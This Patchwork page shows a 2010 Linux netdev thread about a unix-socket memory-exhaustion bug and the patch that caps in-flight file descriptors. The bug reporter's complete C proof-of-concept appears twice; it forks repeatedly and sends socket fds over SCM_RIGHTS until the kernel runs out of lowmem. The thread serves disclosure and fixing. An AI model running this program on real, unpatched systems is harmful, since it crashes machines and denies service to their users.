Patchwork af_unix: limit unix_tot_inflight

login
register
mail settings
Submitter Eric Dumazet
Date Nov. 24, 2010, 9:18 a.m.
Message ID <1290590335.3464.24.camel@edumazet-laptop>
Download mbox | patch
Permalink /patch/72823/
State Accepted
Delegated to: David Miller
Headers show

Comments

Eric Dumazet - Nov. 24, 2010, 9:18 a.m.
Le mercredi 24 novembre 2010 à 00:11 +0100, Eric Dumazet a écrit :
> Le mardi 23 novembre 2010 à 23:21 +0100, Vegard Nossum a écrit :
> > Hi,
> > 
> > I found this program lying around on my laptop. It kills my box
> > (2.6.35) instantly by consuming a lot of memory (allocated by the
> > kernel, so the process doesn't get killed by the OOM killer). As far
> > as I can tell, the memory isn't being freed when the program exits
> > either. Maybe it will eventually get cleaned up the UNIX socket
> > garbage collector thing, but in that case it doesn't get called
> > quickly enough to save my machine at least.
> > 
> > #include <sys/mount.h>
> > #include <sys/socket.h>
> > #include <sys/un.h>
> > #include <sys/wait.h>
> > 
> > #include <errno.h>
> > #include <fcntl.h>
> > #include <stdio.h>
> > #include <stdlib.h>
> > #include <string.h>
> > #include <unistd.h>
> > 
> > static int send_fd(int unix_fd, int fd)
> > {
> >         struct msghdr msgh;
> >         struct cmsghdr *cmsg;
> >         char buf[CMSG_SPACE(sizeof(fd))];
> > 
> >         memset(&msgh, 0, sizeof(msgh));
> > 
> >         memset(buf, 0, sizeof(buf));
> >         msgh.msg_control = buf;
> >         msgh.msg_controllen = sizeof(buf);
> > 
> >         cmsg = CMSG_FIRSTHDR(&msgh);
> >         cmsg->cmsg_len = CMSG_LEN(sizeof(fd));
> >         cmsg->cmsg_level = SOL_SOCKET;
> >         cmsg->cmsg_type = SCM_RIGHTS;
> > 
> >         msgh.msg_controllen = cmsg->cmsg_len;
> > 
> >         memcpy(CMSG_DATA(cmsg), &fd, sizeof(fd));
> >         return sendmsg(unix_fd, &msgh, 0);
> > }
> > 
> > int main(int argc, char *argv[])
> > {
> >         while (1) {
> >                 pid_t child;
> > 
> >                 child = fork();
> >                 if (child == -1)
> >                         exit(EXIT_FAILURE);
> > 
> >                 if (child == 0) {
> >                         int fd[2];
> >                         int i;
> > 
> >                         if (socketpair(PF_UNIX, SOCK_SEQPACKET, 0, fd) == -1)
> >                                 goto out_error;
> > 
> >                         for (i = 0; i < 100; ++i) {
> >                                 if (send_fd(fd[0], fd[0]) == -1)
> >                                         goto out_error;
> > 
> >                                 if (send_fd(fd[1], fd[1]) == -1)
> >                                         goto out_error;
> >                         }
> > 
> >                         close(fd[0]);
> >                         close(fd[1]);
> >                         goto out;
> > 
> >                 out_error:
> >                         fprintf(stderr, "error: %s\n", strerror(errno));
> >                 out:
> >                         exit(EXIT_SUCCESS);
> >                 }
> > 
> >                 while (1) {
> >                         pid_t kid;
> >                         int status;
> > 
> >                         kid = wait(&status);
> >                         if (kid == -1) {
> >                                 if (errno == ECHILD)
> >                                         break;
> >                                 if (errno == EINTR)
> >                                         continue;
> > 
> >                                 exit(EXIT_FAILURE);
> >                         }
> > 
> >                         if (WIFEXITED(status)) {
> >                                 if (WEXITSTATUS(status))
> >                                         exit(WEXITSTATUS(status));
> >                                 break;
> >                         }
> >                 }
> >         }
> > 
> >         return EXIT_SUCCESS;
> > }
> > 
> > 
> > Vegard
> > --

Here is a patch to address this problem.

Thanks

[PATCH] af_unix: limit unix_tot_inflight

Vegard Nossum found a unix socket OOM was possible, posting an exploit
program.

My analysis is we can eat all LOWMEM memory before unix_gc() being
called from unix_release_sock(). Moreover, the thread blocked in
unix_gc() can consume huge amount of time to perform cleanup because of
huge working set.

One way to handle this is to have a sensible limit on unix_tot_inflight,
tested from wait_for_unix_gc() and to force a call to unix_gc() if this
limit is hit.

This solves the OOM and also reduce overall latencies, and should not
slowdown normal workloads.

Reported-by: Vegard Nossum <vegard.nossum@gmail.com>
Signed-off-by: Eric Dumazet <eric.dumazet@gmail.com>
Cc: Andrew Morton <akpm@linux-foundation.org>
Cc: Eugene Teo <eugene@redhat.com>
---
 net/unix/garbage.c |    7 +++++++
 1 files changed, 7 insertions(+)



--
To unsubscribe from this list: send the line "unsubscribe netdev" in
the body of a message to majordomo@vger.kernel.org
More majordomo info at  http://vger.kernel.org/majordomo-info.html
Andi Kleen - Nov. 24, 2010, 2:44 p.m.
Eric Dumazet <eric.dumazet@gmail.com> writes:
>
> diff --git a/net/unix/garbage.c b/net/unix/garbage.c
> index c8df6fd..40df93d 100644
> --- a/net/unix/garbage.c
> +++ b/net/unix/garbage.c
> @@ -259,9 +259,16 @@ static void inc_inflight_move_tail(struct unix_sock *u)
>  }
>  
>  static bool gc_in_progress = false;
> +#define UNIX_INFLIGHT_TRIGGER_GC 16000

It would be better to define this as a percentage of
lowmem.

-Andi
Eric Dumazet - Nov. 24, 2010, 3:18 p.m.
Le mercredi 24 novembre 2010 à 15:44 +0100, Andi Kleen a écrit :
> Eric Dumazet <eric.dumazet@gmail.com> writes:
> >
> > diff --git a/net/unix/garbage.c b/net/unix/garbage.c
> > index c8df6fd..40df93d 100644
> > --- a/net/unix/garbage.c
> > +++ b/net/unix/garbage.c
> > @@ -259,9 +259,16 @@ static void inc_inflight_move_tail(struct unix_sock *u)
> >  }
> >  
> >  static bool gc_in_progress = false;
> > +#define UNIX_INFLIGHT_TRIGGER_GC 16000
> 
> It would be better to define this as a percentage of
> lowmem.
> 

I knew somebody would suggest this ;)

Hmm, why bother ?

Do you think 16000 is too big ? Too small ?

1) What would be the percentage of memory ? 1%, 0.001 % ?

  On a 16TB machine, a percentage will still give huge latencies to the
poor guy that hit the unix_gc().

With 16000, the max latency I had was 11.5 ms (on an Intel E5540
@2.53GHz), instead of more than 2000 ms

I guess it would make more sense to limit to the size of cpu cache
anyway.


2) We currently allocate 4096 bytes (on x86_64) to store one file
pointer, or 2048 bytes on x86_32.

But we can store in it up to 255 files.

 I posted a patch to shrink this to 32 or 16 bytes. Should we then
change the heuristic ?

3) Really who needs more than 16000 inflight unix files ?

  (inflight unix files means : af_unix file descriptors that were sent
(sendfd()) through af_unix, not yet garbage collected.).


4) If we autotune a limit at boot time as a lowmem percentage, some guys
then want a /proc/sys/net/core/max_unix_inflight sysctl , just for
completeness. One extra sysctl... 

I cant see valid uses but programs designed to stress our stack.



--
To unsubscribe from this list: send the line "unsubscribe netdev" in
the body of a message to majordomo@vger.kernel.org
More majordomo info at  http://vger.kernel.org/majordomo-info.html
Andi Kleen - Nov. 24, 2010, 4:25 p.m.
> I knew somebody would suggest this ;)
> 
> Hmm, why bother ?
> 
> Do you think 16000 is too big ? Too small ?

I just don't like static limits. Traditionally even the ones
that seemed reasonable at some point were hit by someone
years later.

The latency issue you mention is a valid concern. I guess
an incremental GC would be overkill here ...

-Andi
--
To unsubscribe from this list: send the line "unsubscribe netdev" in
the body of a message to majordomo@vger.kernel.org
More majordomo info at  http://vger.kernel.org/majordomo-info.html
David Miller - Nov. 24, 2010, 5:14 p.m.
From: Eric Dumazet <eric.dumazet@gmail.com>
Date: Wed, 24 Nov 2010 16:18:26 +0100

> 4) If we autotune a limit at boot time as a lowmem percentage, some guys
> then want a /proc/sys/net/core/max_unix_inflight sysctl , just for
> completeness. One extra sysctl... 
> 
> I cant see valid uses but programs designed to stress our stack.

I agree completely with Eric's analysis.

I would even consider setting this threshold lower. :-)

Anyways, consider Eric's patch applied.
--
To unsubscribe from this list: send the line "unsubscribe netdev" in
the body of a message to majordomo@vger.kernel.org
More majordomo info at  http://vger.kernel.org/majordomo-info.html
Michal Hocko - Nov. 26, 2010, 8:50 a.m.
Shouldn't this go to stable?
AFAICS 2.6.32 contains the same code (the patch applies). 
I haven't tried to reproduce the issue yet.

On Wed 24-11-10 10:18:55, Eric Dumazet wrote:
> Le mercredi 24 novembre 2010 ?? 00:11 +0100, Eric Dumazet a ??crit :
> > Le mardi 23 novembre 2010 ?? 23:21 +0100, Vegard Nossum a ??crit :
> > > Hi,
> > > 
> > > I found this program lying around on my laptop. It kills my box
> > > (2.6.35) instantly by consuming a lot of memory (allocated by the
> > > kernel, so the process doesn't get killed by the OOM killer). As far
> > > as I can tell, the memory isn't being freed when the program exits
> > > either. Maybe it will eventually get cleaned up the UNIX socket
> > > garbage collector thing, but in that case it doesn't get called
> > > quickly enough to save my machine at least.
> > > 
> > > #include <sys/mount.h>
> > > #include <sys/socket.h>
> > > #include <sys/un.h>
> > > #include <sys/wait.h>
> > > 
> > > #include <errno.h>
> > > #include <fcntl.h>
> > > #include <stdio.h>
> > > #include <stdlib.h>
> > > #include <string.h>
> > > #include <unistd.h>
> > > 
> > > static int send_fd(int unix_fd, int fd)
> > > {
> > >         struct msghdr msgh;
> > >         struct cmsghdr *cmsg;
> > >         char buf[CMSG_SPACE(sizeof(fd))];
> > > 
> > >         memset(&msgh, 0, sizeof(msgh));
> > > 
> > >         memset(buf, 0, sizeof(buf));
> > >         msgh.msg_control = buf;
> > >         msgh.msg_controllen = sizeof(buf);
> > > 
> > >         cmsg = CMSG_FIRSTHDR(&msgh);
> > >         cmsg->cmsg_len = CMSG_LEN(sizeof(fd));
> > >         cmsg->cmsg_level = SOL_SOCKET;
> > >         cmsg->cmsg_type = SCM_RIGHTS;
> > > 
> > >         msgh.msg_controllen = cmsg->cmsg_len;
> > > 
> > >         memcpy(CMSG_DATA(cmsg), &fd, sizeof(fd));
> > >         return sendmsg(unix_fd, &msgh, 0);
> > > }
> > > 
> > > int main(int argc, char *argv[])
> > > {
> > >         while (1) {
> > >                 pid_t child;
> > > 
> > >                 child = fork();
> > >                 if (child == -1)
> > >                         exit(EXIT_FAILURE);
> > > 
> > >                 if (child == 0) {
> > >                         int fd[2];
> > >                         int i;
> > > 
> > >                         if (socketpair(PF_UNIX, SOCK_SEQPACKET, 0, fd) == -1)
> > >                                 goto out_error;
> > > 
> > >                         for (i = 0; i < 100; ++i) {
> > >                                 if (send_fd(fd[0], fd[0]) == -1)
> > >                                         goto out_error;
> > > 
> > >                                 if (send_fd(fd[1], fd[1]) == -1)
> > >                                         goto out_error;
> > >                         }
> > > 
> > >                         close(fd[0]);
> > >                         close(fd[1]);
> > >                         goto out;
> > > 
> > >                 out_error:
> > >                         fprintf(stderr, "error: %s\n", strerror(errno));
> > >                 out:
> > >                         exit(EXIT_SUCCESS);
> > >                 }
> > > 
> > >                 while (1) {
> > >                         pid_t kid;
> > >                         int status;
> > > 
> > >                         kid = wait(&status);
> > >                         if (kid == -1) {
> > >                                 if (errno == ECHILD)
> > >                                         break;
> > >                                 if (errno == EINTR)
> > >                                         continue;
> > > 
> > >                                 exit(EXIT_FAILURE);
> > >                         }
> > > 
> > >                         if (WIFEXITED(status)) {
> > >                                 if (WEXITSTATUS(status))
> > >                                         exit(WEXITSTATUS(status));
> > >                                 break;
> > >                         }
> > >                 }
> > >         }
> > > 
> > >         return EXIT_SUCCESS;
> > > }
> > > 
> > > 
> > > Vegard
> > > --
> 
> Here is a patch to address this problem.
> 
> Thanks
> 
> [PATCH] af_unix: limit unix_tot_inflight
> 
> Vegard Nossum found a unix socket OOM was possible, posting an exploit
> program.
> 
> My analysis is we can eat all LOWMEM memory before unix_gc() being
> called from unix_release_sock(). Moreover, the thread blocked in
> unix_gc() can consume huge amount of time to perform cleanup because of
> huge working set.
> 
> One way to handle this is to have a sensible limit on unix_tot_inflight,
> tested from wait_for_unix_gc() and to force a call to unix_gc() if this
> limit is hit.
> 
> This solves the OOM and also reduce overall latencies, and should not
> slowdown normal workloads.
> 
> Reported-by: Vegard Nossum <vegard.nossum@gmail.com>
> Signed-off-by: Eric Dumazet <eric.dumazet@gmail.com>
> Cc: Andrew Morton <akpm@linux-foundation.org>
> Cc: Eugene Teo <eugene@redhat.com>
> ---
>  net/unix/garbage.c |    7 +++++++
>  1 files changed, 7 insertions(+)
> 
> diff --git a/net/unix/garbage.c b/net/unix/garbage.c
> index c8df6fd..40df93d 100644
> --- a/net/unix/garbage.c
> +++ b/net/unix/garbage.c
> @@ -259,9 +259,16 @@ static void inc_inflight_move_tail(struct unix_sock *u)
>  }
>  
>  static bool gc_in_progress = false;
> +#define UNIX_INFLIGHT_TRIGGER_GC 16000
>  
>  void wait_for_unix_gc(void)
>  {
> +	/*
> +	 * If number of inflight sockets is insane,
> +	 * force a garbage collect right now.
> +	 */
> +	if (unix_tot_inflight > UNIX_INFLIGHT_TRIGGER_GC && !gc_in_progress)
> +		unix_gc();
>  	wait_event(unix_gc_wait, gc_in_progress == false);
>  }
>  
> 
> 
> --
> To unsubscribe from this list: send the line "unsubscribe linux-kernel" in
> the body of a message to majordomo@vger.kernel.org
> More majordomo info at  http://vger.kernel.org/majordomo-info.html
> Please read the FAQ at  http://www.tux.org/lkml/
David Miller - Nov. 27, 2010, 2:27 a.m.
From: Michal Hocko <mhocko@suse.cz>
Date: Fri, 26 Nov 2010 09:50:00 +0100

> Shouldn't this go to stable?
> AFAICS 2.6.32 contains the same code (the patch applies). 
> I haven't tried to reproduce the issue yet.

I'll submit it to all the stable branches after this patch (and the
other AF_UNIX fixes recently proposed) have sat in Linus's tree for at
least half a week or so.
--
To unsubscribe from this list: send the line "unsubscribe netdev" in
the body of a message to majordomo@vger.kernel.org
More majordomo info at  http://vger.kernel.org/majordomo-info.html
Michal Hocko - Nov. 29, 2010, 10:37 a.m.
On Fri 26-11-10 18:27:14, David Miller wrote:
> From: Michal Hocko <mhocko@suse.cz>
> Date: Fri, 26 Nov 2010 09:50:00 +0100
> 
> > Shouldn't this go to stable?
> > AFAICS 2.6.32 contains the same code (the patch applies). 
> > I haven't tried to reproduce the issue yet.
> 
> I'll submit it to all the stable branches after this patch (and the
> other AF_UNIX fixes recently proposed) have sat in Linus's tree for at
> least half a week or so.

OK, thanks!

Patch

diff --git a/net/unix/garbage.c b/net/unix/garbage.c
index c8df6fd..40df93d 100644
--- a/net/unix/garbage.c
+++ b/net/unix/garbage.c
@@ -259,9 +259,16 @@  static void inc_inflight_move_tail(struct unix_sock *u)
 }
 
 static bool gc_in_progress = false;
+#define UNIX_INFLIGHT_TRIGGER_GC 16000
 
 void wait_for_unix_gc(void)
 {
+	/*
+	 * If number of inflight sockets is insane,
+	 * force a garbage collect right now.
+	 */
+	if (unix_tot_inflight > UNIX_INFLIGHT_TRIGGER_GC && !gc_in_progress)
+		unix_gc();
 	wait_event(unix_gc_wait, gc_in_progress == false);
 }